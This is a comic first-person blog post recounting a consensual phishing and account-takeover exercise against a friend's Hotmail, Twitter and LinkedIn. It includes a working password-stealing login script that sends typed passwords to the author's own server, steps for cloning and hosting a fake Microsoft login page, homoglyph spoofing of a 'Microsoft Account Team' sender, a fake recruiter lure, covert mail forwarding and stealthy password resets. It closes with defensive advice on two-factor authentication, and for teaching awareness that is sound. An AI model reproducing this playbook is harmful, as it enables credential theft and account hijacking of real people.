I can't send the email from my email account, because I'm not a total amateur. I use the popular hacking tool The Microsoft Sign Up Screen to make the hotmail account "[email protected]". If you look closely, "account" is spelled wrong. I used "msft" because it wouldn't let me include the word "microsoft".
I try to register an account with first name "Microsoft" and last name "Account Team". The signup form doesn't let me. Blast. Thwarted by Microsoft lackeys. Probably, Microsoft doesn't let you have "Microsoft" in your account name to prevent, uh, exactly what I'm doing. Hmmm. I don't really want to have a typo in the name, like "Micorsoft", since Diana might notice that.
Instead I, a level 8 Wizard, cast a spell to swap the "o" characters in "Microsoft" for a special unicode character (like an emoji but much worse) that looks exactly like an "o". It's not, of course, it's our old friend, the Greek letter "Omicron". Here's the two pals side-by side:
οo
Awww, just look at 'em having a blast. These little guys might look different in the font your device is using, but in the hotmail web UI font they look juuuust right👌.
So now, my account's name isn't "Microsoft", It's "Micr[omicron]s[omicron]ft", according to the code that checks whether you have a valid name when you sign up for an account.
I'm sure you're wondering how this whole process ends up with me getting Diana's password, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she'll be asked to log in15. The page she goes to will look just like the Hotmail login page, but it will really be a copy that sends the password to me.
How can I make such a page? Well I'll clone the real page, register a domain that looks similar to login.live.com, host my cloned page there, and so on. Juuust kidding, the static website hosting service Aerobatic happens to also be an excellent phishing service.
I can register [anything].aerobatic.io, and deploy my static HTML to that domain with their command line tool for free.
Shout outs to Aerobatic for the smooth smooth phishing UX. Use the referral code DIANA to be immediately reported to the NSA.
I copy the existing login.live.com page, and pre-fill [email protected] in the "email address" field. I deploy this page extremely trivially to login-live.aerobatic.io, and equip my fourth pair of sunglasses (don't worry I've earned it). This almost looks right, but the real Hotmail login form has a bunch of stuff after the / in the URL, so I copy/paste some of that good stuff too16.
Here's the exact URL, if you're interested. Also if you're not interested. It's gonna be there either way.
https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin
Perfect17. This looks similar enough to fool a cursory glance, and that's all we need baybee. Maybe she'll think "why do I have to log in again? I'm already logged in to my email?", but the email asks for a "Secure Login" (whatever that is).
Here's what the login page does:
// When the Login button is clicked or Enter is pressed $('#passwordForm').on('submit', function() { var password = $('#password').val(); // Create an image with a URL that points to my website. // The browser will request this URL in an attempt to load the image (which will fail since that URL doesn't exist) $('body').append('<img src="a-website-i-own.com/DIANA?'%20+%20password%20+%20'" alt="image">'); // Wait one second to simulate loading time (adjust to 0.1s if you don't live in Australia sigh), and then go to the real Hotmail login page. // Diana will already be logged in, so this will seem to her exactly like she's just logged in to hotmail. window.setTimeout(function() { window.location = 'login.live.com' }, 1000); return false; }
This works by sending her password to me when she clicks "log in". The password is sent a website of mine. Then I send her along to the real Hotmail, so it looks just liked she logged in. The website logs everything that gets sent to it, so I can then search my logs for "DIANA" to find the log containing the password.
This is all what I'm hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you have to do something right now is a common tactic to make you think instinctively and irrationally.
I login to my fake "Microsoft Account Team" hotmail account, send the email to [email protected] and wait for her to have herself a red-hot browse.
About 12 hours later, I check my logs to see if she's typed her password.
She doesn't.
I wait another 12 hours.
Still nothing.
I send the email again, wincing slightly, this time saying she has 24 hours.
Still nothing.
Well damn
I guess that didn't work. She must have just ignored the email as uninteresting18
I try to think of non-phishing ways to get her password but really phishing is just too good. The nice thing about being the attacker is that you can put your eggs in many baskets. Diana has to defend against all of my eggs, and I've got baskets for days. Time for round 2.
Sniper scope targeted phishing blap blap
I reach under my desk, unwrap a parcel addressed to "DIRECTOR OF CYBER, NSA", slide out a yellow and black canister labelled "CHINA", break open the safety seal, and use safety tongs to extract the following red-hot phish.
This time, instead of using a generic idea that would work on anyone ("suspicious account activity"), we'll make something special just for Diana. Kinda like hand-knitting a beanie, but comparatively less wholesome.
I Google "google docs microsoft equivalent" and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive look I dunno just look it's Google Docs but Microsoft so good enough for me.
I make a convincing looking resume (in Google Docs, of course) and copy it into a OneSkyCloudDrive 364/2 Days: Final Remix HD+ Doc.
Let's play: who's gonna send this doc to Diana?
I find a local company that's likely to legitimately want to talk to Diana, and search for a recruiter who works there on LinkedIn. I make someone with the same first name, but a different last name as a real recruiter from this company19.
I make a fake gmail account called Kathleen Wheeler, using a stock photo of a middle-aged western woman as the profile photo.
Here's what Kathleen is going to email Diana.
Looks legit riiiight?
The questions at the end are just some garbage I made up, but the point of them is to distract Diana right after she reads the "click here".
I put Diana's real phone number at the end to make it more convincing. This email is obviously meant just for her. It also makes sense for the phone number to be there, since presumably whoever listed Diana as a referee gave the phone number to Kathleen.
At the time she types her password, we want Diana to be thinking of what's on the other side of the login screen.
The delicious bait here is that this email says "someone said they know you", and you have to read the resume to find out who. Aw, but the resume is behind a pesky link. ~Guess you better just click on it~. LinkedIn also does this in their, um, "engagement" emails which say things like "you have 2 new messages", but not who they're from or what they say.
When Diana clicks on the link to the "resume", it will take her to the same fake login page (with her email pre-filled) as before. When she types anything in the password box, the site will wait one second and then send her to the Microsoft Google Doc™. The one-second wait is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks
She'll find that she doesn't know the person, probably because they're completely made up. They have work experience at real workplaces nearby, and went to the same university as Diana at around the same time, so hopefully their resume passes a cursory glance20.
Finding an unfamiliar resume is a sufficient, but not particularly satisfying conclusion to the adventure of the weird email from Kathleen. But of course, by then it's too late, I'm sitting in my ivory tower surrounded by passwords.
I make sure to send it during business hours, from "Kathleen""", pull a necklace from under my shirt dramatically, kiss it, look up at the sky, and wait.
Waiting
That night, I check my website's logs for any passwords from my fake Hotmail login form.
- - [[date]:16:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.1" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
"Got it!"
..... is what I think, at first.
Particularly keen readers will have noticed that the password Diana has typed into my fake Hotmail login page is... the same password as we found for her in the Tumblr database.
This is not her Hotmail password, and everything is terrible.
From this we can draw two conclusions:
Diana doesn't know what her Hotmail password is
She now thinks her hotmail password is qwerty1, since she typed it into my fake login page which accepts any password, and it worked
I almost gave up at this point, but a last-minute burst of desperation/frustration/final destination helped me work up the courage to have another shot here in Act 3.
By this point my fake Microsoft Account Team email account has been soft-banned by the good people at William Gates Inc. for sending so many obvious phishing emails. I have to prove I'm a human and add my phone number to the account, and then it unlocks and I can edit the Microsoft Google Doc.
I hastily make a new fake resume of significantly lower quality than the first one, and make a crucial change to my fake login page.
My fake login page now says "wrong password" no matter what you type in the first two times you try typing something. If you type qwerty1, then the password counter doesn't go up21.
What do people do when they get a "wrong password" error? Try all of the 3 or 4 passwords they use for everything, of course.
I want to try and get Diana to type qwerty1, get a "wrong password" error, and then just unload all her passwords into my form.
Diana replied to my failed email with "sorry I don't know this person", and so Kathleen replies with, "wrong resume lol, here's the new one" even though this makes zero sense in the context of our email exchange. I'm hoping Diana will just be busily checking the email on her phone and not really notice this discrepancy.
I use a different font from the "form" when typing as Kathleen to make it look like this is a form that gets copy/pasted to every candidate. This makes Kathleen seem like she does this all the time in her big bustling, 100% real office. I also do my best to imitate the tone of a polite but stressed out office worker. You can almost hear the office politics. It's called method acting.
Time to stressfully wait for Diana to check for her email again, so now would be a good time to read out some donations.
Hours later
It works.
108.162.249.169 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 "https://docs-login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
I get only one password from Diana (typed multiple times), but it's different to the last one I got (qwerty1)22.
I wait until she's asleep based on her Facebook Messenger last active time and log into her email using the elite hacking method of typing her password into the box.
The reason I waited until she was asleep was in case Hotmail emailed the account saying "New Sign In". It doesn't, and I'm rewarded with her email inbox screen in its full glory.
Angels sing softly above me. A small yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they're really sorry and they've done a lot of soul searching and they want to make it up to me and I should expect premium fruit baskets on my doorstep in the coming months. Global warming halts.
"But that would never work on me"
It would tho.
Perhaps some of you in the audience are thinking "Wow, this Diana person must be pretty dumb to fall for that. Good thing I'm a web browsing prodigy with a colossal brain and many opinions, so that would never happen to me."
The thing is, right now you're very alert, because you're reading a blog post about hacking. If you were just reading your email, half-paying-attention on a train as normal, security wouldn't likely be on your mind. If sending trick emails is good enough for whoever the NSA, are emailing, then it's probably good enough to work on you and me.
I guess what I'm saying here is "don't go shaming phishing victims plz".
Anyway sorry back to haͅck͐i̥n̏g̜
Part 4: HACKER VOICE I'M IN
I immediately try Diana's email password (wertyu2) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I've chosen someone with slightly above average personal security to target.
The obvious next step is to forward all her email to me (so I don't have to keep logging in to her email). Before I set up email forwarding, I try it out on a hotmail account I control. I'm testing to see if setting up "forward all your email to this address" sets off any notifications I'll have to delete, or notifies you in any other way.
In gmail, when you forward all your mail to another email address, the other address gets emailed a code, and also a big red bar appears on your gmail inbox saying "you're sending literally all of your email to this address FYI" for 7 days.
I type in my email address into my test hotmail account, and click "forward all my mail here pls". It saves. I check both email inboxes for a notification email. There isn't one. I've just backdoored this email account and no fuss has been made whatsoever. OH well at least hotmail has NoMansSkyDrive 2.8 Remastered XL Online or whatever.
An interlude from Diana
Diana replies to my email saying she doesn't know this person either. She's a little suspicious, so I try and say something that will close the conversation.
Diana doesn't reply.
Hey remember how you can search email?
Now that I have Diana's email password, I want to search her email for more passwords, and use those passwords to get more, and so on, like a REAL hacker.
Try going to your email and searching for "password". Betcha there's passwords in there.
In Hotmail, when you go to search something, the last 5 searches you've done pop up as suggestions.
This means that if I search for "password", Diana will notice "password" in the search history. That would be a really lame way to get caught.
To get around this, I: * Wait until Diana is asleep * Write down her last 5 searches * Search for "password" * Look at the results * Search for her last 5 searches again, in reverse order
Since only the last 5 searches are shown, by repeating the searches in reverse order, the search history looks exactly the same.
Much to the disappointment of the live studio audience, I don't find anything particularly useful. I find the two passwords I already know (qwerty1 and wertyu2) several times, and one other password which I again try on all her accounts, but doesn't work </3.
I hang out in Diana's email for several months. Every so often I check it. I find her signing a contract for a job, and so I get her passport number, signature, phone number, bank account number, and basically everything I'd need to impersonate her. I don't really232425 want to impersonate someone's government-issued ID, so I leave this alone.
At one stage, I'm browsing through hit political discourse platform and opinion conveyor belt twitter dot com, and I notice Diana tweet something along the lines of "Finally spent my day off consolidating my 4 email accounts into 1, feels good to be organised".
I panic a little. Have I been found out? I log in to [email protected] (which still works, thankfully) and see that all her emails have been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it's being sent to [email protected] (presumably the new email that Diana now forwards all her mail to).
This raises an important question. How did Diana not notice my email address in the "forward all mail to:" box? Did she see it, and just mindlessly delete it?
(When I interview her after all this, she says yes, that's exactly what she did.)
What now?
Normally it would end here. Mission accomplished. I'm in control of her email. I could cause catastrophic damage to Diana's life if I wanted to (I don't btw). There's potential for endless gags, limitless goofs, unlimited japes, infinte jests, etc.
But.. it seems like an awful shame to just... leave. That's why I start work on a little' somethin' called
Operation Luigi
Everybody just LOVES Mario's green friend Luigi! He's a Certified Good Boy! Just look at that boyish charm.
Why not brighten up YOUR social media presence with this game boy?
Well gee I'm sold after that delightful interlude from our sponsor, The Nintendo. Let's get Diana some uncut, Colombian Luigi.
Step 1: Get in to her Twitter and LinkedIn
So, I want to:
Get access to Diana's Twitter
Not lock Diana out
Not alert Diana that I'm up in her stuff
I could just phish her again for these passwords, but I'm already a salty old fisherman by this point.
Since I have access to her email, I could reset her Twitter password. The problem is, when you reset your Twitter password, you get logged out of Twitter in Chrome, the Twitter app, and anywhere else you might be logged in. So you have to retype your new password. One of my rules was that I wouldn't interrupt Diana's life, so I need her to be able to log back in to Twitter when I force her to log out.
I come up with a simple 8-step plan to do this, with 4 easy repayments of 2 steps.
Wait until Diana is asleep
Disable Diana's email forwarding
Go to Twitter and reset her password
Click the password reset link that gets emailed to her
Set her password to qwerty1
Delete the password reset email
Delete the "New Twitter Sign In" email
Re-enable email forwarding
The combo move in this is setting her password to qwerty1. When I phished her email password, she tried to log in to her email with qwerty1 even though that's not her password. This tells me that she thinks her password for everything is qwerty1, or at least, that's what she'll try if she's not sure. The technical term for this is next-level mindgames💻💻💻.
I do the steps above, and I'm now logged in to Diana's Twitter account. I tigheten up her Twitter security settings because I'm a Good Boy. I HOPE that Diana will be able to log back in as well, and not wonder why she suddenly got logged out. I wait stressfully for her to tweet something, and after a day or so she retweets a cute doggo, so we're good to go.
Now I want to do the same thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don't want her to get too suspicious, so I wait a week. I do the same process as with Twitter. This time I don't even wait until Diana is asleep, because I'm young and invincible.
As I'm setting Diana's password on LinkedIn back to qwerty1, LinkedIn doesn't let me.
Is this because qwerty1 was a password present in the LinkedIn hack in 2012? Or because it's just a common password? For a brief moment I panic, but then I realise I can just set Diana's password to her email password, wertyu2.
Astute readers will have noticed this little guy in the screenshot above.
LinkedIn is asking me if I'd like to log out of Diana's LinkedIn account on all devices while I'm resetting the password. That's REAL nice of you to offer old mate LinkedIn but I'm absolutely golden as it is in terms of logouts so don't even worry about it I'll be just fine how it is NO REALLY don't trouble yourself, I'm sure your CPU cycles are busy displaying everyone's 6000 word Thinkpieces about "Cyber" for "Non-technical Business Decision Makers".
Yeah so I submit that form 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.
Step 2: Bring in the green boys
I enlist the help of a talented friend to photoshop everyone's #1 boy next door Luigi subtly into Diana's profile picture on Twitter, like a green guardian angel.
I can't show you Diana's pictures, so here's me doing similar photoshops to Your Boy And Mine, Five Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Give It Up For Dr. Barack Obama Everybody:
At about this time I tweet about our sweet green boy so that if Diana sees her guardian angel Luigi, she'll know it was me. This is like my calling card except.... well it's not really like a calling card it's pretty dorky to be honest but just LOOK at that wholesome lad, you just KNOW he'd help you fix a flat tyre, and he'd just be too gosh darn polite to correct you if you said "thanks green mario" so really if you think about it I guess it IS like a calling card.
Next up I log into her LinkedIn account, get overwhelmed by her 15 LinkedIn notifications, 7 new profile views, 11 new Key People To Bother, and several pop ups telling me about new features I can use to invite people to join my professional network on LinkedIn™®©. Then I change her profile picture to my really good version.
For about a week, Diana continues her Twitter and LinkedIn(?) usage whilst being silently Luigi'd. Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are also fans of the hit 2001 ghostbusting game, Luigi's Mansion.
Well that just about wraps up Operation Luigi. Glad that's all done and dusted.
Although...
I'm basically a Luigi technician at this point, and it would be a shame to let all that work go to waste. So let's just do
~one more thing~
Operation Waluigi: A dark turn for mature audiences
Waluigi, true to his character, is much more direct.
Damn RIGHT this new profile strength is "Advanced."
Please enjoy these half-baked opsec-enabled26 tweets27.
I also make Diana follow a bunch of Waluigi fan accounts (there are a lot), Nintendo of America, and @EmojiAquarium because it's a damn good account.
Part 5: Epilogue
Diana likes her new Waluigi life so much she keeps it all up there, and even changes her Facebook photo to a Waluigi'd one.
I meet up with her and ask her about her side of the story a few days later.
Here are some choice quotes:
"I've since listened to a lot of Waluigi songs" "Waluigi is the ultimate symbol of postmodernism, he exists only as a foil"
I ask her "How do you think I did it?". She says I must have hacked her email and reset her Twitter password, but she has no idea how I hacked her email.
When I show her the email chain with Kathleen on my computer her jaw drops for several seconds.
"You catfished me!"
We go back to the same ramen place after the interview. The credits roll.
"wait but i am very afraid after reading this blog post, how do I not get 360 noscope hacked like diana tho"
Hey kids, it's me, "Alex". We've had a lot of fun today, but now it's time to talk about the real issues. The moral of this story is that it's really easy for someone else to know your password. Fret not, for you are young and extremely online, and it's not too late for you yet.
Step 1: Go to https://haveibeenpwned.com and type in your email address. This doesn't actually do anything, it's just to instill sufficient fear in you.
Step 228: Go to your email and enable "Two-step Authentication". You can go to https://www.google.com.au/landing/2step if you use gmail. If you use Hotmail then I dunno, there's probably like a SkyCloud 360 X LIVE subscription you can buy that lets you do it.
Now, as well as your email password, you also type in a code from an app on your phone. Or you can have the code SMSed to you on your pastel-pink flip phone if you wanna relive the 90s29.
If Diana had Verified Good Content Two-step Authentication turned on, then I would have had to get a two-factor code AND her password. I would have had to either:
Phish the code as well as the password (but the code expires in less than 60 seconds)
Physically go to the same place as her, connect to the same WiFi, and steal her browser session
Email her a Word Doc with a macro in it that gives me control of her laptop, and steal her browser cookies from it
Call up her phone provider and trick them into pointing her phone number at my SIM card
All of these are more work and higher risk, and so hackers often just move on to lower hanging fruit. That's you in this situation. You're the delicious fruit. And the hackers are.... giraffes? Yeah. Watch out for giraffes.
Freshly baked shoutouts to My Absolute Homeslices for being my blog-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io
If you want to talk to me about this, hit me up in the tweet zone (@mangopdf) or direct your browser to mango.pdf.zone
A careless mistake ↩︎
Obviously the best way is to not give permission to meeeeeeeee😎 ↩︎
I found her LinkedIn by just googling her name #pwned ↩︎
wait did he just say "hacker voice I'm in"? ↩︎
I haven't realised yet that successfully resetting Diana's iCloud password would lock her out of her account and violate our agreement. This is because I'm a weapons-grade bozo. ↩︎
On haveibeenpwned.com, Diana's email address shows up in a data dump from this website. It's a game of some sort? ↩︎
Later when I interview Diana, she says "I use exclusively Google Docs", so I was right! No comment about the avocado thing. ↩︎
I'm not making these up, these are real words that real hackers use I swear. ↩︎
Diana didn't have LinkedIn in 2012, so she's not in the list. But some of the 20 people who had the same password as her sure did. ↩︎
tag urself lol ↩︎
I also try guessing what her password could be based on the password I already have for her (qwerty1) but it doesn't work. ↩︎
low ↩︎
effort ↩︎
From 2002 do NOT @ me ↩︎
This makes no sense, since she'll be reading her Hotmail, and then asked to log in to the same thing she's already reading, but NON-fake websites have bad enough UX that this is believable. ↩︎
I steal all that good stuff after the URL from the Google sign-in page ;>_> ↩︎
Awkwardly, Hotmail changed its login screen shortly before this blog post came out. It used to look like that I swear. ↩︎
There are a few reasons this email wasn't attention grabbing. It was automated, from a company (not an actual human), and wasn't specifically about her, but about her account. ↩︎
When I interview her later, Diana says she looked up the company! She even says that getting back to Kathleen was on her to-do list, the poor thing. ↩︎
Months later, I notice I've left a "Lorem ipsum dolor sit amet, consectetur adipiscing elit" as a dot point on the resume. ↩︎
This is a genius suggestion from one of my ~hacker connections~. ↩︎
At this point Diana has been completely gaslighted as to what her hotmail password is, because my phishing site said the wrong password was right, and then said the right password was wrong, and she thinks it's the real Hotmail. ↩︎
I mean it WOULD be pretty funny ↩︎
And wow you could do anything, book flights, get a job, change your name... ↩︎
Just letting any Government Agents reading this know that I did NOT end up doing anything with this and I love democracy. ↩︎
If you really tried you could probably find Diana's Twitter from these. You would then be a hacking genius, binary flowing through your veins, and have a CVE number assigned to your personally. I, a humble wannabee, am relying on your strict ethics to prevent you from, uh, stalking the friend of some guy whose blog post you read. You can do it. I believe in you. ↩︎
Having said that, I don't really have an overwhelming amount of faith in the idea that someone won't try to do that. You can stay chilled out, dear reader, since before this blog was published Diana and I had a nice chat and fixed up her personal security. ↩︎
Password managers like LastPass are also good for giving you unique passwords, but I reckon 2FA is the best effort:security ratio value For Normal People Tee Em. ↩︎
But, this is less secure, since your phone number can still be hijacked. ↩︎
387 notes · View notes